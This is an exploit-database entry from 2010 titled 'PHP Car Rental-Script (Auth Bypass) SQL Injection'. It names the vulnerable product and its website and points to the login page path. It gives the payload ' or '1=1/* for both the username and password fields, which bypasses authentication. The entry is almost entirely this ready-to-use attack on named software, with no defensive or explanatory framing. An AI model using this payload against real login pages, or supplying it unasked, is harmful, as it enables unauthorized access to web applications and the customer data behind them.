id: 10762
date: 02/03/2010
title: PHP Car Rental-Script (Auth Bypass) SQL Injection
author: n/a
cves: 

=================================================
PHP Car Rental-Script (Auth Bypass) SQL Injection
=================================================

/*
 
Name : PHP Car Rental-Script (Auth Bypass) SQL Injection
WebSite : http://www.carrentalphpscript.com/
 
Author : Hamza 'MizoZ' N.

 
*/
 
- Log-On page :
 
http://server/[PATH]/index.php?plugin_id=4
 
username = ' or '1=1/*
password = ' or '1=1/*



#  0day.today [2023-03-26]  #